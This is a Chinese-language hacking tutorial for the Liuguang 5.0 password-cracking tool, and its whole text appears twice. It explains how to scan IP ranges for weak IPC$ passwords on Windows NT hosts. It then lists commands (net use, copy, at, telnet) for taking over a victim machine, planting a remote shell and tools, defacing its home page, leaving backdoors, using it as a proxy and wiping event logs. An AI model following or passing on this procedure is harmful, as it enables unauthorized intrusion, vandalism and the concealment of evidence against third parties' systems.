流光5.0破解密碼教程

流光5.0破解密碼教程

　　流光5.0的使用方法

　　1：流光概述

　　流光，這款工具可以讓一個只會點擊鼠標(biāo)的人成為專業(yè)的黑客，這樣說一點也不夸張。它可以探測POP3，F(xiàn)TP，HTTP，PROXY，F(xiàn)ROM，SQL，SMTP，IPC，等各種漏洞。并針對個中漏洞設(shè)計不同的破解方案。

　　2：流光使用：

　　步驟1：打開高級掃描向?qū)гO(shè)置掃描參數(shù)

　　“文件”--}“高級掃描向?qū)?rdquo;

　　--}在“起始”/“結(jié)束”位置填入，你要掃描的IP段。

　　--}在“ 目標(biāo)系統(tǒng)”中選擇你要檢測的操作系統(tǒng)。

　　--}在“獲取主機名”、“PING檢查”前面打勾

　　--}在“檢測項目”中選擇“全選”

　　--}然后單擊“下一步”選擇“標(biāo)準(zhǔn)端口掃描”

　　說明：“標(biāo)準(zhǔn)斷口”只對常見的斷口進行掃描。

　　“自定義”可以自己定義進行掃描。

　　--}然后單擊“下一步” 設(shè)置好所有檢測項目后點擊“下一步”

　　--}在選擇主機界面選擇“本地主機”使用本地主機進任務(wù)掃描。

　　步驟2：單擊“開始”掃描過程中要想停止選擇“取消”不過要等一段時間。

　　步驟3：查看掃描報告。掃描結(jié)束之后給出“HTLM”格式的報告

　　方法二：

　　一、POP3/FTP/…探測

　　二、IPC探測

　　三、SQL探測

　　四、高級掃描

　　五、其它 …

　　因為開發(fā)時間的原因，上面的探測模式略有不同，所以分成了四個部分，本教程說的是第一個部分的探測。后面的探測模式應(yīng)該屬于流光的高級應(yīng)用了：)

　　流光的IPC探測：

　　一、目的和任務(wù)：

　　1、用流光的IPC探測獲得一臺NT主機的管理權(quán)限，并將這臺主機做成一個跳板/代理。

　　2、學(xué)習(xí)IPC探測的相關(guān)知識。

　　二、探測流程：

　　1、你得有流光，我這里試驗用的是流光2001.FOR Win2000 中文版。FOR Win98的不可以。因為IPC連接功能是NT/ 2000提供的功能。而且流光FOR 2K 要求你的操作系統(tǒng)得是NT/2000，否則流光啟動會失敗!

　　什么是IPC：

　　IPC是指"InterProcess Communications",準(zhǔn)確的說是ipc$，是默認(rèn)的在系統(tǒng)啟動時的admin共享。

　　IPC$是Windows NT/2K中特有的遠程網(wǎng)絡(luò)登陸功能，它的特點是在同一時間內(nèi)，兩個IP之間只允許建立一個連接。

　　注意，你試圖通過IPC$連接會在EventLog中留下記錄。不管你是否登錄成功。

　　可不可以通過IPC$暴力破解密碼?當(dāng)然可以 ! 不過，是不是太笨了點 …

　　2、首次啟動流光，會看到注冊的畫面，具體操作請參考本人第一篇教程。我們在主頁面上可以有幾種方法來通過IPC 探測獲得管理的權(quán)限。這里我們要作的是得到一臺跳板，那么就可以用命中率高的辦法來探測了(測試一堆IP來得到弱口令)。

　　在主界面選擇 探測→探測POP3/FTP/NT/SQL主機選項，或者直接按Ctrl+R。

　　3、出先了上面的小窗口，輸入我們要破解的IP段，我們輸入了來看看。圖main2我們把“將FrontPage主機自動加入HTTP主機列表取消了”。因為我們只想獲得IPC弱口令，這樣可以加快掃描的速度 ：)填入IP，選擇掃描NT/98主機

　　4、探測中……

　　(注意如果你要探測的是流光保留的國內(nèi)的IP段，會被禁止的，也就是探測的時候信息欄出現(xiàn)"IP保留"的字樣)

　　有遠程主機的管理密碼了，我們剩下的就是想辦法控制它了，有什么好辦么? ：)有的是 !自己看看工具-菜單下的IIS遠程命令:)是不是很簡單呢，我以后在說，今天還是先練習(xí)net 命令吧。

　　黑了他 !

　　開個dos prompt 執(zhí)行如下命令，本次用的例子如下圖。

　　1、 net use \對方ip\ipc$ "密碼" /user:"用戶名" || 建立遠程連接

　　2、 copy icmd.exe \對方ip\admin$ || admin$是對方的winnt目錄 ：) 這里文件多。

　　3、 net time \對方IP || 看看對方的本地時間

　　4、at \對方ip 啟動程序的時間 啟動程序名 啟動程序的參數(shù) || 用at命令來定時啟動程序，在這里我們用soon這個程序來做也可以，它可以取代 3/4兩步。

　　5、 telnet 對方ip 端口 ||

　　6、輸入pass (如果不是用icmd.exe，或者沒有設(shè)置口令就不用了) ||

　　7、在開個窗口，繼續(xù)copy 我們用的東西。 copy sock.exe copy ntlm.exe copy cl.exe clear.exe

　　如果我們真的想黑了他，只需要把我們的首頁文件覆蓋目標(biāo)的首頁就ok了，我們可以通過dir /s default.htm或者dir /s index.htm 來確定對方首頁的為止，一般是在X:\interpub\wwwroot\ .

　　假如首頁文件是default.htm并且在c:\interpub\wwwroot，這樣:copy default.htm \ip\c$\interpub\wwwroot

　　下面的圖有演示

　　8、其實黑人家是很低級并且沒意思的：(，我們最好是物有所有，作成跳板吧，今后干活方便點：

　　執(zhí)行我們copy 過去的ntlm.exe ，取消驗正。在給自己留個后門，比如提升guest的權(quán)限，或者其它的后門工具，這類東西多了自己選吧，看看殺手copy的那堆東西 ：)

　　9、還能做成其他的么 ?

　　當(dāng)然了，只要你有時間，并且愿意做，我曾經(jīng)偷偷的把自己的主頁放到人家的server上，速度快、空間無限，嘿嘿 ：)

　　10、日志清除，斷開連接 ：

　　執(zhí)行我們copy 過去的cl.exe clear.exe 都可以清除日志，比如clear all ：清除所有的日志。然后在斷開連接：net use \ip\ipc$ /delete

　　流光簡介

　　流光4.7)一個絕好的ftp、pop3解密工具，界面豪華，功能強大!功能簡介如下：1、用于檢測POP3/FTP主機中用戶密碼安全漏洞。2、163/169雙通。3、多線程檢測，消除系統(tǒng)中密碼漏洞。4、高效的用戶流模式。5、高效服務(wù)器流模式，可同時對多臺POP3/FTP主機進行檢測。6、最多500個線程探測。7、線程超時設(shè)置，阻塞線程具有自殺功能，不會影響其他線程。8、支持10個字典同時檢測。9、檢測設(shè)置可作為項目保存。10、取消了國內(nèi)IP限制而且免費。

　　流光4.7新增功能：

　　1、加入了本地模式，在本機運行是不必安裝Sensor。

　　2、Sensor掃描臨時結(jié)果文件(*.PTR)的尺寸大約減少了10倍。

　　3、后臺掃描模式時，掃描的結(jié)果(*.PTR)可以直接通過附件發(fā)送到信箱。

　　4、Sensor的掃描速度加快。

　　5、減少了Sensor異常退出的BUG。

　　6、流光的界面和Sensor之間的通訊采用Triple-DES，密鑰的長度最多可到192bits，保證整個傳輸過程不可監(jiān)聽。掃描的結(jié)果也只有在密鑰正確的情況下才可閱讀。

　　7、修正的控制服務(wù)，新的控制服務(wù)在升級Sensor時不再會失敗。

　　8、Sensor的服務(wù)名稱可以任意指定，控制服務(wù)和Sensor的進程名稱也可以任意指定。

　　9、支持XP(本地模式)，很快會有98/ME的版本。

　　流光5.0的使用方法

　　1：流光概述

　　流光，這款工具可以讓一個只會點擊鼠標(biāo)的人成為專業(yè)的黑客，這樣說一點也不夸張。它可以探測POP3，F(xiàn)TP，HTTP，PROXY，F(xiàn)ROM，SQL，SMTP，IPC，等各種漏洞。并針對個中漏洞設(shè)計不同的破解方案。

　　2：流光使用：

　　步驟1：打開高級掃描向?qū)гO(shè)置掃描參數(shù)

　　“文件”--}“高級掃描向?qū)?rdquo;

　　--}在“起始”/“結(jié)束”位置填入，你要掃描的IP段。

　　--}在“ 目標(biāo)系統(tǒng)”中選擇你要檢測的操作系統(tǒng)。

　　--}在“獲取主機名”、“PING檢查”前面打勾

　　--}在“檢測項目”中選擇“全選”

　　--}然后單擊“下一步”選擇“標(biāo)準(zhǔn)端口掃描”

　　說明：“標(biāo)準(zhǔn)斷口”只對常見的斷口進行掃描。

　　“自定義”可以自己定義進行掃描。

　　--}然后單擊“下一步” 設(shè)置好所有檢測項目后點擊“下一步”

　　--}在選擇主機界面選擇“本地主機”使用本地主機進任務(wù)掃描。

　　步驟2：單擊“開始”掃描過程中要想停止選擇“取消”不過要等一段時間。

　　步驟3：查看掃描報告。掃描結(jié)束之后給出“HTLM”格式的報告

　　方法二：

　　一、POP3/FTP/…探測

　　二、IPC探測

　　三、SQL探測

　　四、高級掃描

　　五、其它 …

　　因為開發(fā)時間的原因，上面的探測模式略有不同，所以分成了四個部分，本教程說的是第一個部分的探測。后面的探測模式應(yīng)該屬于流光的高級應(yīng)用了：)

　　流光的IPC探測：

　　一、目的和任務(wù)：

　　1、用流光的IPC探測獲得一臺NT主機的管理權(quán)限，并將這臺主機做成一個跳板/代理。

　　2、學(xué)習(xí)IPC探測的相關(guān)知識。

　　二、探測流程：

　　1、你得有流光，我這里試驗用的是流光2001.FOR Win2000 中文版。FOR Win98的不可以。因為IPC連接功能是NT/ 2000提供的功能。而且流光FOR 2K 要求你的操作系統(tǒng)得是NT/2000，否則流光啟動會失敗!

　　什么是IPC：

　　IPC是指"InterProcess Communications",準(zhǔn)確的說是ipc$，是默認(rèn)的在系統(tǒng)啟動時的admin共享。

　　IPC$是Windows NT/2K中特有的遠程網(wǎng)絡(luò)登陸功能，它的特點是在同一時間內(nèi)，兩個IP之間只允許建立一個連接。

　　注意，你試圖通過IPC$連接會在EventLog中留下記錄。不管你是否登錄成功。

　　可不可以通過IPC$暴力破解密碼?當(dāng)然可以 ! 不過，是不是太笨了點 …

　　2、首次啟動流光，會看到注冊的畫面，具體操作請參考本人第一篇教程。我們在主頁面上可以有幾種方法來通過IPC 探測獲得管理的權(quán)限。這里我們要作的是得到一臺跳板，那么就可以用命中率高的辦法來探測了(測試一堆IP來得到弱口令)。

　　在主界面選擇 探測→探測POP3/FTP/NT/SQL主機選項，或者直接按Ctrl+R。

　　3、出先了上面的小窗口，輸入我們要破解的IP段，我們輸入了來看看。圖main2我們把“將FrontPage主機自動加入HTTP主機列表取消了”。因為我們只想獲得IPC弱口令，這樣可以加快掃描的速度 ：)填入IP，選擇掃描NT/98主機

　　4、探測中……

　　(注意如果你要探測的是流光保留的國內(nèi)的IP段，會被禁止的，也就是探測的時候信息欄出現(xiàn)"IP保留"的字樣)

　　有遠程主機的管理密碼了，我們剩下的就是想辦法控制它了，有什么好辦么? ：)有的是 !自己看看工具-菜單下的IIS遠程命令:)是不是很簡單呢，我以后在說，今天還是先練習(xí)net 命令吧。

　　黑了他 !

　　開個dos prompt 執(zhí)行如下命令，本次用的例子如下圖。

　　1、 net use \對方ip\ipc$ "密碼" /user:"用戶名" || 建立遠程連接

　　2、 copy icmd.exe \對方ip\admin$ || admin$是對方的winnt目錄 ：) 這里文件多。

　　3、 net time \對方IP || 看看對方的本地時間

　　4、at \對方ip 啟動程序的時間 啟動程序名 啟動程序的參數(shù) || 用at命令來定時啟動程序，在這里我們用soon這個程序來做也可以，它可以取代 3/4兩步。

　　5、 telnet 對方ip 端口 ||

　　6、輸入pass (如果不是用icmd.exe，或者沒有設(shè)置口令就不用了) ||

　　7、在開個窗口，繼續(xù)copy 我們用的東西。 copy sock.exe copy ntlm.exe copy cl.exe clear.exe

　　如果我們真的想黑了他，只需要把我們的首頁文件覆蓋目標(biāo)的首頁就ok了，我們可以通過dir /s default.htm或者dir /s index.htm 來確定對方首頁的為止，一般是在X:\interpub\wwwroot\ .

　　假如首頁文件是default.htm并且在c:\interpub\wwwroot，這樣:copy default.htm \ip\c$\interpub\wwwroot

　　下面的圖有演示

　　8、其實黑人家是很低級并且沒意思的：(，我們最好是物有所有，作成跳板吧，今后干活方便點：

　　執(zhí)行我們copy 過去的ntlm.exe ，取消驗正。在給自己留個后門，比如提升guest的權(quán)限，或者其它的后門工具，這類東西多了自己選吧，看看殺手copy的那堆東西 ：)

　　9、還能做成其他的么 ?

　　當(dāng)然了，只要你有時間，并且愿意做，我曾經(jīng)偷偷的把自己的主頁放到人家的server上，速度快、空間無限，嘿嘿 ：)

　　10、日志清除，斷開連接 ：

　　執(zhí)行我們copy 過去的cl.exe clear.exe 都可以清除日志，比如clear all ：清除所有的日志。然后在斷開連接：net use \ip\ipc$ /delete

　　流光簡介

　　流光4.7)一個絕好的ftp、pop3解密工具，界面豪華，功能強大!功能簡介如下：1、用于檢測POP3/FTP主機中用戶密碼安全漏洞。2、163/169雙通。3、多線程檢測，消除系統(tǒng)中密碼漏洞。4、高效的用戶流模式。5、高效服務(wù)器流模式，可同時對多臺POP3/FTP主機進行檢測。6、最多500個線程探測。7、線程超時設(shè)置，阻塞線程具有自殺功能，不會影響其他線程。8、支持10個字典同時檢測。9、檢測設(shè)置可作為項目保存。10、取消了國內(nèi)IP限制而且免費。

　　流光4.7新增功能：

　　1、加入了本地模式，在本機運行是不必安裝Sensor。

　　2、Sensor掃描臨時結(jié)果文件(*.PTR)的尺寸大約減少了10倍。

　　3、后臺掃描模式時，掃描的結(jié)果(*.PTR)可以直接通過附件發(fā)送到信箱。

　　4、Sensor的掃描速度加快。

　　5、減少了Sensor異常退出的BUG。

　　6、流光的界面和Sensor之間的通訊采用Triple-DES，密鑰的長度最多可到192bits，保證整個傳輸過程不可監(jiān)聽。掃描的結(jié)果也只有在密鑰正確的情況下才可閱讀。

　　7、修正的控制服務(wù)，新的控制服務(wù)在升級Sensor時不再會失敗。

　　8、Sensor的服務(wù)名稱可以任意指定，控制服務(wù)和Sensor的進程名稱也可以任意指定。

　　9、支持XP(本地模式)，很快會有98/ME的版本。